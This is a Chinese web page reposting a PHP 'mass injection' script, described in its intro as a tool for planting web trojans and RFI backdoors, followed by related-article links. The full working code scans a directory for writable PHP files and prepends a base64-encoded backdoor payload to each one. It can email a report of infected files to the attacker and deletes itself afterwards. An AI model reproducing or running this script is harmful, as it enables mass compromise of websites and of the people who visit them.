php挂马攻击,PHP批量挂马脚本
来源:红狼
作者:f3v3r
批量写入档案脚本…
可以拿来挂马
也能拿来当RFI的后门注入
code都写明的,有需要的请自己看
后门写在$inj里面,要做base64 encode的Polymorphic
不希望这个东西被搞破坏的人拿去玩
懂原理的就自个儿收下吧
set_time_limit(0);
ignore_user_abort(1);
# PHP Mass Injection Script by f3v3r ver.228
# |1| Look for PHP in directory.|2| Check injected.
# |3| Inject script. |4|Can email report to you.
$inj ='';
$log_email = 0;//change 1 enable, somehow they can trace you by this way.
$email = '[email protected]';
$log_report = 1;
$filename = '__log.html';
$delete_me = 1;
echo '
f3v3r injection toolzDefacez aint hack, r00tz r.
';
$dir = opendir('.');
$site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
while ($file = readdir($dir))
{
if (strstr($file, '.php') && is_writeable($file))
{
$victim = fopen($file, 'r+');
$victim_read = fread($victim, filesize($file));
if (!strstr($victim_read, 'f3v3r'))
{
fclose($victim);
unlink($file);
$new = fopen($file, 'a+');
$new_write = fwrite($new, base64_decode($inj) . $victim_read);
fclose($new);
echo '[-] injecting : ' . $site . '
';
echo '[x] injected: ' . $file . '
';
if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() . $file . '
'); fclose($log); }
if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() . $file . '\n'); fclose($x); }
}
}
}
closedir($dir);
if($log_email) { $report = file_get_contents('__tmp'); mail($email, "injection report", '
f3v3r
' .$report, 'From: f3v3r '); unlink('__tmp'); echo '[x] Email Report Sent!';}
if($delete_me) { unlink(__file__); }
exit;
?>
MD5 checksum:DE734BDAC73E6ECE8DD3DB40416976E8
#f3v3r
php挂马攻击,PHP批量挂马脚本相关推荐
- 一键复制php代码,PHP_php下批量挂马和批量清马代码,复制代码 代码如下:?php funct - phpStudy...
php下批量挂马和批量清马代码 复制代码 代码如下: function gmfun($path=".") { $d = @dir($path); while(false !== ( ...
- php 批量删除挂马文件夹,PHP批量挂马脚本
批量写入档案脚本... 可以拿来挂马 也能拿来当RFI的后门注入 code都写明的,有需要的请自己看 后门写在$inj里面,要做base64 encode的Polymorphic 不希望这个东西被搞破 ...
- 瑞星4月2日安全综述:网页挂马攻击严重
4月2日安全综述: 据瑞星"云安全"系统统计,4月2日共有2,501,573人次的网民遭到网页挂马攻击,瑞星共截获了794,761个挂马网址,比昨日多出5万挂马网址. 当日被挂马网 ...
- Web应急:网站被批量挂黑页
Web应急:网站被批量挂黑页 作为一个网站管理员,你采用开源CMS做网站,比如dedecms,但是有一天,你忽然发现不知何时,网站的友情链接模块被挂大量垃圾链接,网站出现了很多不该有的目录,里面全是博 ...
- 神马权重查询 神马权重如何批量查询
本人陈晓晓最近入职了柳州的一家SEO公司,接手管理了130多个网站,领导让我每天检测神马权重,但是我手动一个一个非常的耗时间,有没有什么方法可以快速批量查询神马权重呢? 最近发现使用iis7站 ...
- 网站神马权重 批量神马权重方法
本人许俊能最近入职了长沙的一家SEO公司,接手管理了100多个网站,需要每天检测神马权重情况,手动一个一个非常的耗时间,但是有什么方法可以快速神马权重批量查询呢? 最近发现使用iis7站长之家 ...
- 亚马逊物流批量清货计划的优势你知道?
亚马逊物流批量清货计划是亚马逊清理冗余库存的项目之一,旨在帮助卖家处理冗余库存和买家退货,避免产生仓储费和弃置处理费,防止浪费,同时收回商品部分成本.那么亚马逊物流批量清货计划的优势有哪些? 优势一. ...
- 马走日程序Java_马走日什么意思
中国象棋在中国有着三千多年的历史,在中国古代,象棋被列为士大夫们的修身之艺,属于琴棋书画四艺之一.现在则被视为是怡神益智的一种有益身心的活动. 中国象棋是由两人轮流走子,以"将死" ...
- 大一计算机系挂科,大一挂科和大三挂科,哪个后果更严重?实际差距不是一星半点...
文/ 大学的自由并非真正的自由,过度挥霍必将承担代价. 很多学生都希望自己可以考上大学,但是在读了大学之后却开始自我放纵,享受难得的自由生活,因此失去了原本的学习自律性. 大学与高中时期不同,更需要学 ...
- c语言 100匹马 编程,编程,百马百担有关问题,有100匹马,驮100担货,大马驮三担,中马驮2担,两匹小马驮一担,求大、中、小各多少匹...
编程,百马百担问题,有100匹马,驮100担货,大马驮三担,中马驮2担,两匹小马驮一担,求大.中.小各多少匹? 编程,百马百担问题,有100匹马,驮100担货,大马驮三担,中马驮2担,两匹小马驮一担, ...
最新文章
- (四)Asp.net web api中的坑-【api的返回值】
- Linux桌面环境与命令行环境切换快捷键,以及linux 图形界面 X Server 关闭 启动
- linux一键优化脚本1.0
- Java IO - 字符流
- LoadRunner本机录制http协议程序遇到的问题以及解决方法
- 深度学习《EBGAN》
- 飞龙的安卓逆向系列教程
- 地平线获近亿美元A+轮融资,AI时代的英特尔被英特尔领投
- 应用案例 | 从Storm到Flink,有赞五年实时计算效率提升实践
- ubuntu 安装及相关软件安装(1)
- Path接口与Files工具类
- android 信号检测工具,信号检测软件下载-Signal Strength 安卓版v23.0.1-PC6安卓网
- RGB565常见颜色对照表
- ImageNet缔造者:让冰冷的机器读懂照片背后的故事
- ArcGIS地图打印
- python对时间序列的DataFrame数据按时间段进行切分求和
- 3步解决AS提示:Compilation is not supported for following modules
- RGB与CMYK颜色模式调色原理
- mysql今天日期_MySQL获取今天的日期
- 华为云电脑+teamviewer ssh实现手机远程操控服务器